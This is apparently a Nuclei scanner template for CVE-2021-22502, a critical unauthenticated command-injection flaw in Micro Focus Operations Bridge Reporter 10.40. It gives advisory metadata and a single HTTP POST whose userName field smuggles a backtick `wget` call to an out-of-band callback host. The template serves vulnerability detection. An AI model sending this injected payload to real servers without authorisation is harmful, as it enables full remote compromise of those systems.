id: CVE-2021-22502 info: name: Micro Focus Operations Bridge Reporter - Remote Code Execution author: pikpikcu severity: critical description: | Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. impact: | Unauthenticated attackers can execute arbitrary commands on the Operations Bridge Reporter server, leading to complete system compromise and access to all monitoring data. remediation: | Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://softwaresupport.softwaregrp.com/doc/KM03775947 - https://www.zerodayinitiative.com/advisories/ZDI-21-153/ - https://nvd.nist.gov/vuln/detail/CVE-2021-22502 - https://www.zerodayinitiative.com/advisories/ZDI-21-154/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 epss-score: 0.968 epss-percentile: 0.99879 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microfocus product: operation_bridge_reporter tags: cve2021,cve,microfocus,obr,rce,kev,vkev,vuln http: - raw: - | POST /AdminService/urest/v1/LogonResource HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - "dns" - type: word part: body words: - "An error occurred" - "AUTHENTICATION_FAILED" condition: and - type: word part: header words: - "application/json" - type: status status: - 401 # digest: 4a0a00473045022069a4d2df3fdfbafbbf1bee59232c66a16c2b74df6ca15a86a3e37d6259cd4e1a022100e1107b616168715088196e3ed6b3103a91436d0163c1f686d769a81a4600d421:922c64590222798bb761d5b6d8e72950